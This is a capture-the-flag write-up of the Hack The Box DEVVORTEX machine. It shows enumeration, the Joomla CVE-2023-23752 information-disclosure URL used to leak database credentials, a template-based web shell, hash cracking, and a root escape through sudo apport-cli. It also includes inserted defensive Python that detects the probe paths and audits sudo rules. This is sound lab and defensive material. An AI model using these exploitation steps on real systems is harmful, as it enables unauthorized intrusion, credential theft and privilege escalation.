Here are my notes on the DEVVORTEX box from Hack The Box.
DEVVORTEX:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
devvortex.htb
┌──(root㉿kali)-[/home/kali/BOXES/COMP/DEVVORTEX]
└─# wfuzz -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://devvortex.htb -H 'Host: FUZZ.devvortex.htb' --hl 7
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://devvortex.htb/
Total requests: 100000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000022: 200 501 L 1581 W 23221 Ch "dev"
dev.devvortex.htb - Joomla site!
http://dev.devvortex.htb/robots.txt:
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
http://dev.devvortex.htb/administrator/manifests/files/joomla.xml - very interesting.
<folder>administrator</folder>
<folder>api</folder>
<folder>cache</folder>
<folder>cli</folder>
<folder>components</folder>
<folder>images</folder>
<folder>includes</folder>
<folder>language</folder>
<folder>layouts</folder>
<folder>libraries</folder>
<folder>media</folder>
<folder>modules</folder>
<folder>plugins</folder>
<folder>templates</folder>
<folder>tmp</folder>
<file>htaccess.txt</file>
<file>web.config.txt</file>
<file>LICENSE.txt</file>
<file>README.txt</file>
<file>index.php</file>
/web.config.txt
Joomla version 4.2.6, vulnerable to the information disclosure exploit (CVE-2023-23752).
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true
{"type":"application","id":"224","attributes":{"user":"lewis","id":224}},{"type":"application","id":"224","attributes":{"password":"[REDIRECTED]","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"sd4fg_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":
lewis:[REDIRECTED]
# Able to log in to the Joomla service with lewis's creds.
http://dev.devvortex.htb/api/index.php/v1/users?public=true
lewis = Super Users
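Added here as an example (not part of the original notes or of any Joomla code): a defender-side check for the CVE-2023-23752 disclosure above. It matches the two API paths against constructed nginx access-log lines and parses a constructed response in the shape shown above to report which configuration keys are exposed; the log lines, the sample response and the two extra keys host and secret are assumptions.

```python
import json
import re

# Constructed nginx combined-format access log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2023:12:40:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 4112 "-" "curl/7.88.1"
203.0.113.5 - - [13/Dec/2023:12:40:02 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 812 "-" "curl/7.88.1"
198.51.100.9 - - [13/Dec/2023:12:41:10 +0000] "GET /index.php HTTP/1.1" 200 23221 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# The two endpoints CVE-2023-23752 abuses; an unauthenticated hit carrying public=true is the tell.
PROBE_RE = re.compile(r'^/api/index\.php/v1/(config/application|users)\b.*[?&]public=true')

def find_cve_2023_23752_probes(log_text):
    """Return (ip, path, status) for each access-log line matching the disclosure pattern."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and PROBE_RE.match(m.group("path")):
            hits.append((m.group("ip"), m.group("path"), int(m.group("status"))))
    return hits

# Constructed response in the shape shown above: every config key comes back as its own
# JSON:API resource object. The password value is a placeholder.
SAMPLE_RESPONSE = json.dumps({"data": [
    {"type": "application", "id": "224", "attributes": {"user": "lewis", "id": 224}},
    {"type": "application", "id": "224", "attributes": {"password": "PLACEHOLDER_DB_PASSWORD", "id": 224}},
    {"type": "application", "id": "224", "attributes": {"db": "joomla", "id": 224}},
    {"type": "application", "id": "224", "attributes": {"dbprefix": "sd4fg_", "id": 224}},
    {"type": "application", "id": "224", "attributes": {"dbencryption": 0, "id": 224}},
    {"type": "application", "id": "224", "attributes": {"sitename": "DevVortex", "id": 224}},
]})

# Keys that must never be readable without a session: the four leaked on this page plus two
# more standard Joomla configuration.php keys (host, secret) assumed here.
SENSITIVE_KEYS = {"user", "password", "db", "dbprefix", "host", "secret"}

def flatten_config(raw):
    """Merge the per-key resource objects into one {key: value} dict, dropping the repeated id."""
    attrs = {}
    for item in json.loads(raw).get("data", []):
        attrs.update({k: v for k, v in item.get("attributes", {}).items() if k != "id"})
    return attrs

def exposed_secrets(attrs):
    """Sorted list of sensitive keys present; a non-empty result means the endpoint is leaking."""
    return sorted(k for k in attrs if k in SENSITIVE_KEYS)
```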
- Able to modify a template to gain a shell.
# Make sure it's an administrator template, because the other one is locked.
Web-Shell to User Shell !
https://exploit-notes.hdks.org/exploit/web/cms/joomla-cms-pentesting/
https://hackertarget.com/attacking-enumerating-joomla/
https://www.exploit-db.com/exploits/51334
https://vulncheck.com/blog/joomla-for-rce
Reverse shell on any CMS
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla
PRIV ESC:
www-data -> logan:
mysql:
#With lewis creds.
Users_Tables:
logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M[REDIRECTED]
# Crack it with John the Ripper.
┌──(root㉿kali)-[/home/kali/BOXES/COMP/DEVVORTEX]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDIRECTED] (logan)
1g 0:00:00:12 DONE (2023-12-13 12:56) 0.07733g/s 108.5p/s 108.5c/s 108.5C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
logan:[REDIRECTED]
SSH with logan creds = USER SHELL !
USER.TXT: [REDIRECTED]
logan -> root:
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$
Create a report, then press V and enter !/bin/bash to gain a root shell!
sudo /usr/bin/apport-cli -f
What would you like to do? Your options are:
S: Send report (89.8 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
root@devvortex:/home/logan# whoami
root
root@devvortex:/home/logan#
https://github.com/diego-tella/CVE-2023-1326-PoC
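Added as an example, not from the original notes or from the PoC linked above: an audit of `sudo -l` output in the format shown above that flags apport-cli as a pager shell escape (CVE-2023-1326). The sample text and its benign second rule are constructed.

```python
import re

# Constructed `sudo -l` output in the format shown on this page; the second rule is a made-up benign one.
SAMPLE_SUDO_L = """\
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
    (root) NOPASSWD: /usr/bin/ls /var/log
"""

# Binaries known to hand the caller an interactive pager; apport-cli's case is CVE-2023-1326.
PAGER_ESCAPES = {
    "/usr/bin/apport-cli": "CVE-2023-1326: 'V'iew report opens a pager that accepts ! shell commands",
}

# One rule line: "(runas) [TAG: ...] command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

def parse_sudo_rules(text):
    """Return the command rules from `sudo -l` output as dicts (runas, nopasswd, binary, args)."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True  # everything after this header is a rule line
            continue
        m = RULE_RE.match(line) if in_commands else None
        if m:
            argv = m.group("cmd").split()
            rules.append({"runas": m.group("runas").strip(),
                          "nopasswd": "NOPASSWD:" in m.group("tags"),
                          "binary": argv[0], "args": argv[1:]})
    return rules

def audit_sudo_rules(rules):
    """Flag rules whose binary can spawn a shell from its pager; root runas makes it full privesc."""
    findings = []
    for r in rules:
        reason = PAGER_ESCAPES.get(r["binary"])
        if reason:
            as_root = r["runas"].split(":")[0].strip() in ("ALL", "root")
            findings.append({"binary": r["binary"], "as_root": as_root, "reason": reason})
    return findings
```

The fix on the host side is to remove the rule or patch apport; env_reset and secure_path do not help, because the escape goes through the pager's own command prompt rather than the environment.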
root@devvortex:/home/logan# cd /root
root@devvortex:~# ls
root.txt
root@devvortex:~# cat root.txt
[REDIRECTED]
root@devvortex:~#
ROOT.TXT: [REDIRECTED]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Thank you for reading my notes!